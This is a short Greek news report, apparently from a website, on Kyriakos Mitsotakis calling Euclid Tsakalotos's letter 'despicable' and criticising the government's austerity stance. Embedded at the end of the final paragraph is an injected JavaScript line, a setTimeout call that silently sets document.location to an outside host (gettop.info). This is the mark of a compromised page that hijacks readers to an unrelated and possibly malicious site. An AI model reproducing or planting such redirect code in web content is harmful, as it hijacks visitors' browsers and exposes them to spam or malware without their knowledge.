Κυρ. Μητσοτάκης: Κατάπτυστη η επιστολή Τσακαλώτου

0
7

 

«Στο εσωτερικό, σηκώνει μπαϊράκι και στο εξωτερικό, ζητάει συγγνώμη», ανέφερε σε συνέντευξή του στον ραδιοφωνικό σταθμό «Alpha 9,89», ο πρόεδρος της ΝΔ Κυριάκος Μητσοτάκης, ο οποίος έκανε λόγο για «παιχνίδι διγλωσσίας» της κυβέρνησης.

Ο επικεφαλής της αξιωματικής αντιπολίτευσης επεσήμανε ότι οι κκ. Τσίπρας και Τσακαλώτος είναι οι καλύτεροι σύμμαχοι του κ. Σόιμπλε, ικανοποιώντας «κάθε του επιθυμία».

Στη συνέχεια, χαρακτήρισε «κατάπτυστη» την επιστολή του κ. Τσακαλώτου, ενώ υποστήριξε ότι «η κυβέρνηση υπογράφει τα πάντα και καταδικάζει τη χώρα σε παρατεταμένη λιτότητα».

Παράλληλα, δεσμεύτηκε για τη διεξαγωγή εξεταστικής επιτροπής για την πρώτη περίοδο του 2015, καθώς «εκεί τορπιλίστηκε η προσπάθεια ανάκαμψης της οικονομίας».

Σχετικά με τα πόθεν έσχες, ξεκαθάρισε ότι «δεν θα πέσουμε στο παιχνίδι του κιτρινισμού, όπως έκανε ο ΣΥΡΙΖΑ», ενώ αναφερόμενος ειδικότερα στο πόθεν έσχες του κ. Σταθάκη, παραδέχθηκε πως εγείρονται ερωτήματα, τα οποία ο ίδιος πρέπει να μας εξηγήσει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here